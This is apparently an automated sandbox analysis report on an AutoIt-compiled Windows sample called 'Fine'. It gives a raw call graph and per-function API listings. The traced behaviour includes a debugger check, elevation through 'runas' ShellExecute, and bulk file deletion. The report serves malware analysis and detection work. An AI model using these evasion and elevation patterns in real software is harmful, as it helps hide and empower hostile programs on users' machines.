98358 1d630e 98356->98358 98358->98354 98361 1d6316 98358->98361 98362 215353 98361->98362 98363 1d6322 98361->98363 98410 1d3b39 98363->98410 98382 1d1352 98381->98382 98386 1d1371 __fread_nolock 98381->98386 98385 1f017b 8 API calls 98382->98385 98383 1f014b 8 API calls 98384 1d1388 98383->98384 98384->98350 98385->98386 98386->98383 98387->98344 98562 1d663e LoadLibraryA 98388->98562 98393 215648 98396 1d66e7 68 API calls 98393->98396 98394 1d66a4 LoadLibraryExW 98570 1d6607 LoadLibraryA 98394->98570 98398 21564f 98396->98398 98399 1d6607 3 API calls 98398->98399 98401 215657 98399->98401 98591 1d684a 98401->98591 98402 1d66ce 98402->98401 98403 1d66da 98402->98403 98405 1d66e7 68 API calls 98403->98405 98407 1d62fa 98405->98407 98407->98354 98407->98356 98514 2436d4 98513->98514 98515 1d6874 64 API calls 98514->98515 98516 2436e8 98515->98516 98563 1d6674 98562->98563 98564 1d6656 GetProcAddress 98562->98564 98567 1fe95b 98563->98567 98565 1d6666 98564->98565 98565->98563 98566 1d666d FreeLibrary 98565->98566 98566->98563 98599 1fe89a 98567->98599 98569 1d6698 98569->98393 98569->98394 98571 1d661c GetProcAddress 98570->98571 98572 1d663b 98570->98572 98573 1d662c 98571->98573 98575 1d6720 98572->98575 98573->98572 98574 1d6634 FreeLibrary 98573->98574 98574->98572 98576 1f017b 8 API calls 98575->98576 98577 1d6735 98576->98577 98578 1d423c 8 API calls 98577->98578 98580 1d6741 __fread_nolock 98578->98580 98579 2156c2 98657 243a92 74 API calls 98579->98657 98580->98579 98583 1d677c 98580->98583 98656 243a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 98580->98656 98584 1d684a 40 API calls 98583->98584 98585 215706 98583->98585 98586 1d6874 64 API calls 98583->98586 98590 1d6810 messages 98583->98590 98584->98583 98651 1d6874 98585->98651 98586->98583 98590->98402 98592 1d685c 98591->98592 98595 215760 98591->98595 98689 1fec34 98592->98689 98596 2432bd 98726 24310d 98596->98726 98601 1fe8a6 ___BuildCatchObject 98599->98601 98600 1fe8b4 98624 1ff649 20 API calls __dosmaperr 98600->98624 98601->98600 98603 1fe8e4 98601->98603 98605 1fe8e9 98603->98605 98606 1fe8f6 98603->98606 98604 1fe8b9 98625 202b5c 26 API calls pre_c_initialization 98604->98625 98626 1ff649 20 API calls __dosmaperr 98605->98626 98616 2083e1 98606->98616 98610 1fe8ff 98611 1fe905 98610->98611 98612 1fe912 98610->98612 98627 1ff649 20 API calls __dosmaperr 98611->98627 98628 1fe944 LeaveCriticalSection __fread_nolock 98612->98628 98613 1fe8c4 __wsopen_s 98613->98569 98617 2083ed ___BuildCatchObject 98616->98617 98629 2032d1 EnterCriticalSection 98617->98629 98619 2083fb 98630 20847b 98619->98630 98623 20842c __wsopen_s 98623->98610 98624->98604 98625->98613 98626->98613 98627->98613 98628->98613 98629->98619 98639 20849e 98630->98639 98631 2084f7 98632 204ff0 __dosmaperr 20 API calls 98631->98632 98633 208500 98632->98633 98635 202d38 _free 20 API calls 98633->98635 98636 208509 98635->98636 98638 208408 98636->98638 98648 203778 11 API calls 2 library calls 98636->98648 98643 208437 98638->98643 98639->98631 98639->98638 98646 1f94fd EnterCriticalSection 98639->98646 98647 1f9511 LeaveCriticalSection 98639->98647 98640 208528 98649 1f94fd EnterCriticalSection 98640->98649 98650 203319 LeaveCriticalSection 98643->98650 98645 20843e 98645->98623 98646->98639 98647->98639 98648->98640 98649->98638 98650->98645 98652 215780 98651->98652 98653 1d6883 98651->98653 98658 1ff053 98653->98658 98656->98579 98657->98583 98661 1fee1a 98658->98661 98663 1fee26 ___BuildCatchObject 98661->98663 98662 1fee32 98686 1ff649 20 API calls __dosmaperr 98662->98686 98663->98662 98664 1fee58 98663->98664 98674 1f94fd EnterCriticalSection 98664->98674 98667 1fee37 98668 1fee64 98674->98668 98686->98667 98692 1fec51 98689->98692 98691 1d686d 98691->98596 98693 1fec5d ___BuildCatchObject 98692->98693 98694 1fec9d 98693->98694 98695 1fec70 ___scrt_fastfail 98693->98695 98696 1fec95 __wsopen_s 98693->98696 98705 1f94fd EnterCriticalSection 98694->98705 98719 1ff649 20 API calls __dosmaperr 98695->98719 98696->98691 98698 1feca7 98706 1fea68 98698->98706 98701 1fec8a 98720 202b5c 26 API calls pre_c_initialization 98701->98720 98705->98698 98710 1fea7a ___scrt_fastfail 98706->98710 98712 1fea97 98706->98712 98707 1fea87 98722 1ff649 20 API calls __dosmaperr 98707->98722 98709 1fea8c 98723 202b5c 26 API calls pre_c_initialization 98709->98723 98710->98707 98710->98712 98717 1feada __fread_nolock 98710->98717 98721 1fecdc LeaveCriticalSection __fread_nolock 98712->98721 98713 1febf6 ___scrt_fastfail 98725 1ff649 20 API calls __dosmaperr 98713->98725 98715 1fdcc5 __fread_nolock 26 API calls 98715->98717 98717->98712 98717->98713 98717->98715 98718 2090c5 __fread_nolock 38 API calls 98717->98718 98724 1fd2e8 26 API calls 4 library calls 98717->98724 98718->98717 98719->98701 98720->98696 98721->98696 98722->98709 98723->98712 98724->98717 98725->98709 98729 1fe858 98726->98729 98732 1fe7d9 98729->98732 98731 1fe875 98733 1fe7fc 98732->98733 98734 1fe7e8 98732->98734 98739 1fe7f8 __alldvrm 98733->98739 98742 2036b2 11 API calls 2 library calls 98733->98742 98740 1ff649 20 API calls __dosmaperr 98734->98740 98736 1fe7ed 98739->98731 98740->98736 98742->98739 98892->98293 98893 226555 98894 1f014b 8 API calls 98893->98894 98896 22655c 98894->98896 98895 226575 __fread_nolock 98898 1f017b 8 API calls 98895->98898 98896->98895 98897 1f017b 8 API calls 98896->98897 98897->98895 98899 22659a 98898->98899 98900 1df5e5 98901 1dcab0 207 API calls 98900->98901 98902 1df5f3 98901->98902 97068 1d1044 97073 1d2793 97068->97073 97070 1d104a 97109 1f0413 29 API calls __onexit 97070->97109 97072 1d1054 97110 1d2a38 97073->97110 97077 1d280a 97078 1dbf73 8 API calls 97077->97078 97079 1d2814 97078->97079 97080 1dbf73 8 API calls 97079->97080 97081 1d281e 97080->97081 97082 1dbf73 8 API calls 97081->97082 97083 1d2828 97082->97083 97084 1dbf73 8 API calls 97083->97084 97085 1d2866 97084->97085 97086 1dbf73 8 API calls 97085->97086 97087 1d2932 97086->97087 97120 1d2dbc 97087->97120 97091 1d2964 97092 1dbf73 8 API calls 97091->97092 97093 1d296e 97092->97093 97094 1e3160 9 API calls 97093->97094 97095 1d2999 97094->97095 97147 1d3166 97095->97147 97097 1d29b5 97098 1d29c5 GetStdHandle 97097->97098 97099 2139e7 97098->97099 97100 1d2a1a 97098->97100 97099->97100 97101 2139f0 97099->97101 97104 1d2a27 OleInitialize 97100->97104 97102 1f014b 8 API calls 97101->97102 97103 2139f7 97102->97103 97154 240ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97103->97154 97104->97070 97106 213a00 97155 2412eb CreateThread 97106->97155 97108 213a0c CloseHandle 97108->97100 97109->97072 97156 1d2a91 97110->97156 97113 1d2a91 8 API calls 97114 1d2a70 97113->97114 97115 1dbf73 8 API calls 97114->97115 97116 1d2a7c 97115->97116 97117 1d8577 8 API calls 97116->97117 97118 1d27c9 97117->97118 97119 1d327e 6 API calls 97118->97119 97119->97077 97121 1dbf73 8 API calls 97120->97121 97122 1d2dcc 97121->97122 97123 1dbf73 8 API calls 97122->97123 97124 1d2dd4 97123->97124 97163 1d81d6 97124->97163 97127 1d81d6 8 API calls 97128 1d2de4 97127->97128 97129 1dbf73 8 API calls 97128->97129 97130 1d2def 97129->97130 97131 1f014b 8 API calls 97130->97131 97132 1d293c 97131->97132 97133 1d3205 97132->97133 97134 1d3213 97133->97134 97135 1dbf73 8 API calls 97134->97135 97136 1d321e 97135->97136 97137 1dbf73 8 API calls 97136->97137 97138 1d3229 97137->97138 97139 1dbf73 8 API calls 97138->97139 97140 1d3234 97139->97140 97141 1dbf73 8 API calls 97140->97141 97142 1d323f 97141->97142 97143 1d81d6 8 API calls 97142->97143 97144 1d324a 97143->97144 97145 1f014b 8 API calls 97144->97145 97146 1d3251 RegisterWindowMessageW 97145->97146 97146->97091 97148 1d3176 97147->97148 97149 213c8f 97147->97149 97151 1f014b 8 API calls 97148->97151 97166 243c4e 8 API calls 97149->97166 97152 1d317e 97151->97152 97152->97097 97153 213c9a 97154->97106 97155->97108 97167 2412d1 14 API calls 97155->97167 97157 1dbf73 8 API calls 97156->97157 97158 1d2a9c 97157->97158 97159 1dbf73 8 API calls 97158->97159 97160 1d2aa4 97159->97160 97161 1dbf73 8 API calls 97160->97161 97162 1d2a66 97161->97162 97162->97113 97164 1dbf73 8 API calls 97163->97164 97165 1d2ddc 97164->97165 97165->97127 97166->97153 97168 20947a 97169 209487 97168->97169 97170 20949f 97168->97170 97225 1ff649 20 API calls __dosmaperr 97169->97225 97174 2094fa 97170->97174 97182 209497 97170->97182 97227 210144 21 API calls 2 library calls 97170->97227 97172 20948c 97226 202b5c 26 API calls pre_c_initialization 97172->97226 97188 1fdcc5 97174->97188 97177 209512 97195 208fb2 97177->97195 97179 209519 97180 1fdcc5 __fread_nolock 26 API calls 97179->97180 97179->97182 97181 209545 97180->97181 97181->97182 97183 1fdcc5 __fread_nolock 26 API calls 97181->97183 97184 209553 97183->97184 97184->97182 97185 1fdcc5 __fread_nolock 26 API calls 97184->97185 97186 209563 97185->97186 97187 1fdcc5 __fread_nolock 26 API calls 97186->97187 97187->97182 97189 1fdce6 97188->97189 97190 1fdcd1 97188->97190 97189->97177 97228 1ff649 20 API calls __dosmaperr 97190->97228 97192 1fdcd6 97229 202b5c 26 API calls pre_c_initialization 97192->97229 97194 1fdce1 97194->97177 97196 208fbe ___BuildCatchObject 97195->97196 97197 208fc6 97196->97197 97198 208fde 97196->97198 97296 1ff636 20 API calls __dosmaperr 97197->97296 97200 2090a4 97198->97200 97205 209017 97198->97205 97303 1ff636 20 API calls __dosmaperr 97200->97303 97202 208fcb 97297 1ff649 20 API calls __dosmaperr 97202->97297 97203 2090a9 97304 1ff649 20 API calls __dosmaperr 97203->97304 97208 209026 97205->97208 97209 20903b 97205->97209 97207 208fd3 __wsopen_s 97207->97179 97298 1ff636 20 API calls __dosmaperr 97208->97298 97230 2054ba EnterCriticalSection 97209->97230 97211 209033 97305 202b5c 26 API calls pre_c_initialization 97211->97305 97213 209041 97215 209072 97213->97215 97216 20905d 97213->97216 97214 20902b 97299 1ff649 20 API calls __dosmaperr 97214->97299 97231 2090c5 97215->97231 97300 1ff649 20 API calls __dosmaperr 97216->97300 97221 209062 97301 1ff636 20 API calls __dosmaperr 97221->97301 97222 20906d 97302 20909c LeaveCriticalSection __wsopen_s 97222->97302 97225->97172 97226->97182 97227->97174 97228->97192 97229->97194 97230->97213 97232 2090d7 97231->97232 97233 2090ef 97231->97233 97322 1ff636 20 API calls __dosmaperr 97232->97322 97235 209459 97233->97235 97240 209134 97233->97240 97345 1ff636 20 API calls __dosmaperr 97235->97345 97236 2090dc 97323 1ff649 20 API calls __dosmaperr 97236->97323 97239 20945e 97346 1ff649 20 API calls __dosmaperr 97239->97346 97241 2090e4 97240->97241 97243 20913f 97240->97243 97247 20916f 97240->97247 97241->97222 97324 1ff636 20 API calls __dosmaperr 97243->97324 97244 20914c 97347 202b5c 26 API calls pre_c_initialization 97244->97347 97246 209144 97325 1ff649 20 API calls __dosmaperr 97246->97325 97250 209188 97247->97250 97252 2091ca 97247->97252 97253 2091ae 97247->97253 97251 209195 97250->97251 97250->97253 97313 20fc1b 97251->97313 97306 203b93 97252->97306 97326 1ff636 20 API calls __dosmaperr 97253->97326 97256 2091b3 97327 1ff649 20 API calls __dosmaperr 97256->97327 97261 209333 97264 2093a9 97261->97264 97268 20934c GetConsoleMode 97261->97268 97262 2091ba 97328 202b5c 26 API calls pre_c_initialization 97262->97328 97263 2091ea 97266 202d38 _free 20 API calls 97263->97266 97267 2093ad ReadFile 97264->97267 97270 2091f1 97266->97270 97271 209421 GetLastError 97267->97271 97272 2093c7 97267->97272 97268->97264 97269 20935d 97268->97269 97269->97267 97273 209363 ReadConsoleW 97269->97273 97274 209216 97270->97274 97275 2091fb 97270->97275 97276 209385 97271->97276 97277 20942e 97271->97277 97272->97271 97278 20939e 97272->97278 97273->97278 97279 20937f GetLastError 97273->97279 97337 2097a4 97274->97337 97335 1ff649 20 API calls __dosmaperr 97275->97335 97280 2091c5 __fread_nolock 97276->97280 97340 1ff613 20 API calls __dosmaperr 97276->97340 97343 1ff649 20 API calls __dosmaperr 97277->97343 97278->97280 97289 209403 97278->97289 97290 2093ec 97278->97290 97279->97276 97281 202d38 _free 20 API calls 97280->97281 97281->97241 97286 209200 97336 1ff636 20 API calls __dosmaperr 97286->97336 97287 209433 97344 1ff636 20 API calls __dosmaperr 97287->97344 97289->97280 97293 20941a 97289->97293 97341 208de1 31 API calls 3 library calls 97290->97341 97342 208c21 29 API calls __wsopen_s 97293->97342 97295 20941f 97295->97280 97296->97202 97297->97207 97298->97214 97299->97211 97300->97221 97301->97222 97302->97207 97303->97203 97304->97211 97305->97207 97307 203bd1 97306->97307 97308 203ba1 __dosmaperr 97306->97308 97349 1ff649 20 API calls __dosmaperr 97307->97349 97308->97307 97309 203bbc RtlAllocateHeap 97308->97309 97348 1f521d 7 API calls 2 library calls 97308->97348 97309->97308 97311 203bcf 97309->97311 97329 202d38 97311->97329 97314 20fc35 97313->97314 97315 20fc28 97313->97315 97318 20fc41 97314->97318 97351 1ff649 20 API calls __dosmaperr 97314->97351 97350 1ff649 20 API calls __dosmaperr 97315->97350 97317 20fc2d 97317->97261 97318->97261 97320 20fc62 97352 202b5c 26 API calls pre_c_initialization 97320->97352 97322->97236 97323->97241 97324->97246 97325->97244 97326->97256 97327->97262 97328->97280 97330 202d6c __dosmaperr 97329->97330 97331 202d43 RtlFreeHeap 97329->97331 97330->97263 97331->97330 97332 202d58 97331->97332 97353 1ff649 20 API calls __dosmaperr 97332->97353 97334 202d5e GetLastError 97334->97330 97335->97286 97336->97280 97354 20970b 97337->97354 97340->97280 97341->97280 97342->97295 97343->97287 97344->97280 97345->97239 97346->97244 97347->97241 97348->97308 97349->97311 97350->97317 97351->97320 97352->97317 97353->97334 97363 205737 97354->97363 97356 20971d 97357 209725 97356->97357 97358 209736 SetFilePointerEx 97356->97358 97376 1ff649 20 API calls __dosmaperr 97357->97376 97360 20972a 97358->97360 97361 20974e GetLastError 97358->97361 97360->97251 97377 1ff613 20 API calls __dosmaperr 97361->97377 97364 205744 97363->97364 97365 205759 97363->97365 97378 1ff636 20 API calls __dosmaperr 97364->97378 97370 20577e 97365->97370 97380 1ff636 20 API calls __dosmaperr 97365->97380 97367 205749 97379 1ff649 20 API calls __dosmaperr 97367->97379 97370->97356 97371 205789 97381 1ff649 20 API calls __dosmaperr 97371->97381 97372 205751 97372->97356 97374 205791 97382 202b5c 26 API calls pre_c_initialization 97374->97382 97376->97360 97377->97360 97378->97367 97379->97372 97380->97371 97381->97374 97382->97372 97383 1df4c0 97386 1ea025 97383->97386 97385 1df4cc 97387 1ea0a3 97386->97387 97388 1ea046 97386->97388 97392 1ea0e7 97387->97392 97395 243fe1 81 API calls __wsopen_s 97387->97395 97388->97387 97390 1e0340 207 API calls 97388->97390 97393 1ea077 97390->97393 97391 22806b 97391->97391 97392->97385 97393->97387 97393->97392 97394 1dbed9 8 API calls 97393->97394 97394->97387 97395->97391

                                                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                                                            Function 001D5FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 224 1d5fc8-1d6037 call 1dbf73 GetVersionExW call 1d8577 229 1d603d 224->229 230 21507d-215090 224->230 231 1d603f-1d6041 229->231 232 215091-215095 230->232 233 1d6047-1d60a6 call 1dadf4 call 1d55dc 231->233 234 2150bc 231->234 235 215097 232->235 236 215098-2150a4 232->236 249 1d60ac-1d60ae 233->249 250 215224-21522b 233->250 239 2150c3-2150cf 234->239 235->236 236->232 238 2150a6-2150a8 236->238 238->231 241 2150ae-2150b5 238->241 242 1d611c-1d6136 GetCurrentProcess IsWow64Process 239->242 241->230 244 2150b7 241->244 246 1d6138 242->246 247 1d6195-1d619b 242->247 244->234 248 1d613e-1d614a 246->248 247->248 251 215269-21526d GetSystemInfo 248->251 252 1d6150-1d615f LoadLibraryA 248->252 253 215125-215138 249->253 254 1d60b4-1d60b7 249->254 255 21524b-21524e 250->255 256 21522d 250->256 257 1d619d-1d61a7 GetSystemInfo 252->257 258 1d6161-1d616f GetProcAddress 252->258 260 215161-215163 253->260 261 21513a-215143 253->261 254->242 262 1d60b9-1d60f5 254->262 263 215250-21525f 255->263 264 215239-215241 255->264 259 215233 256->259 267 1d6177-1d6179 257->267 258->257 266 1d6171-1d6175 GetNativeSystemInfo 258->266 259->264 271 215165-21517a 260->271 272 215198-21519b 260->272 268 215150-21515c 261->268 269 215145-21514b 261->269 262->242 270 1d60f7-1d60fa 262->270 263->259 265 215261-215267 263->265 264->255 265->264 266->267 275 1d617b-1d617c FreeLibrary 267->275 276 1d6182-1d6194 267->276 268->242 269->242 277 2150d4-2150e4 270->277 278 1d6100-1d610a 270->278 279 215187-215193 271->279 280 21517c-215182 271->280 273 2151d6-2151d9 272->273 274 21519d-2151b8 272->274 273->242 285 2151df-215206 273->285 281 2151c5-2151d1 274->281 282 2151ba-2151c0 274->282 275->276 283 2150f7-215101 277->283 284 2150e6-2150f2 277->284 278->239 286 1d6110-1d6116 278->286 279->242 280->242 281->242 282->242 287 215103-21510f 283->287 288 215114-215120 283->288 284->242 289 215213-21521f 285->289 290 215208-21520e 285->290 286->242 287->242 288->242 289->242 290->242
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 001D5FF7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
                                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,0026DC2C,00000000,?,?), ref: 001D6123
                                                                                                                                                                                                                                                                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 001D612A
                                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 001D6155
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 001D6167
                                                                                                                                                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 001D6175
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 001D617C
                                                                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 001D61A1
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                                                                            • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d1c4c0c6981f32fc57b0ea35bf4082a8b4f496f61d7cedfd66eef01f75e9fb54
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7c9cbf225bcaabb7f7854b943efd89ad368501aa5535b220722a62faaebf40af
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1c4c0c6981f32fc57b0ea35bf4082a8b4f496f61d7cedfd66eef01f75e9fb54
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0A1802291A3D4DFCF16DB6C7C491A57FA4AB77300B0858DAE48597322DB6D498CCB31
                                                                                                                                                                                                                                                                                                                            Function 001D338B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,001D3368,?), ref: 001D33BB
                                                                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,001D3368,?), ref: 001D33CE
                                                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,002A2418,002A2400,?,?,?,?,?,?,001D3368,?), ref: 001D343A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001D3462,002A2418,?,?,?,?,?,?,?,001D3368,?), ref: 001D42A0
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001,002A2418,?,?,?,?,?,?,?,001D3368,?), ref: 001D34BB
                                                                                                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00213CB0
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,002A2418,?,?,?,?,?,?,?,001D3368,?), ref: 00213CF1
                                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,002931F4,002A2418,?,?,?,?,?,?,?,001D3368), ref: 00213D7A
                                                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00213D81
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D34D3: GetSysColorBrush.USER32(0000000F), ref: 001D34DE
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D34D3: LoadCursorW.USER32(00000000,00007F00), ref: 001D34ED
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D34D3: LoadIconW.USER32(00000063), ref: 001D3503
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D34D3: LoadIconW.USER32(000000A4), ref: 001D3515
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D34D3: LoadIconW.USER32(000000A2), ref: 001D3527
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001D353F
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D34D3: RegisterClassExW.USER32(?), ref: 001D3590
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001D35E1
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001D3602
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,001D3368,?), ref: 001D3616
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,001D3368,?), ref: 001D361F
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001D3A3C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • 0$*, xrefs: 001D3495
                                                                                                                                                                                                                                                                                                                            • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00213CAA
                                                                                                                                                                                                                                                                                                                            • runas, xrefs: 00213D75
                                                                                                                                                                                                                                                                                                                            • AutoIt, xrefs: 00213CA5
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: 0$*$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                                                            • API String ID: 683915450-183482344
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 14a27f78dd006783ae3cdd01bfc07d218fc6da056653870bc446fae68963eac9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2bf3903d04d5e8be0ee5472940355cdf625513c3cc51cfbfcbd7515380c29873
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14a27f78dd006783ae3cdd01bfc07d218fc6da056653870bc446fae68963eac9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49512D7020C345EFDB05EF64AC49D6E7BE99FA6744F00042EF492522A2DF68865DC753
                                                                                                                                                                                                                                                                                                                            Function 0023DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 1741 23dc54-23dc9b call 1dbf73 * 3 call 1d5851 call 23eab0 1752 23dcab-23dcdc call 1d568e FindFirstFileW 1741->1752 1753 23dc9d-23dca6 call 1d6b7c 1741->1753 1757 23dd4b-23dd52 FindClose 1752->1757 1758 23dcde-23dce0 1752->1758 1753->1752 1759 23dd56-23dd78 call 1dbd98 * 3 1757->1759 1758->1757 1760 23dce2-23dce7 1758->1760 1762 23dd26-23dd38 FindNextFileW 1760->1762 1763 23dce9-23dd24 call 1dbed9 call 1d7bb5 call 1d6b7c DeleteFileW 1760->1763 1762->1758 1764 23dd3a-23dd40 1762->1764 1763->1762 1776 23dd42-23dd49 FindClose 1763->1776 1764->1758 1776->1759
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001D55D1,?,?,00214B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 001D5871
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023EAB0: GetFileAttributesW.KERNEL32(?,0023D840), ref: 0023EAB1
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0023DCCB
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0023DD1B
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0023DD2C
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0023DD43
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0023DD4C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
